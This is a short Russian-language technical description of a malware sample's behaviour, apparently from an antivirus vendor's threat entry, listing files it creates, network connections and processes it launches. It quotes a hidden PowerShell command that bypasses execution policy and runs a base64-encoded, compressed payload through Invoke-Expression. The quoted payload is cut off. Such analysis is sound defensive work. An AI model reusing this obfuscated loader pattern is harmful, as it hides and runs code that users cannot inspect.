Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\e9b2.tmp\e9b3.tmp\e9b4.bat
Удаляет следующие файлы
- %TEMP%\e9b2.tmp\e9b3.tmp\e9b4.bat
Сетевая активность
Подключается к
- '19#.#61.193.99':25093
UDP
- DNS ASK us.##ol.ntp.org
- 'us.##ol.ntp.org':123
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E9B2.tmp\E9B3.tmp\E9B4.bat <Полный путь к файлу>"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E9B2.tmp\E9B3.tmp\E9B4.bat <Полный путь к файлу>"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64Stri...
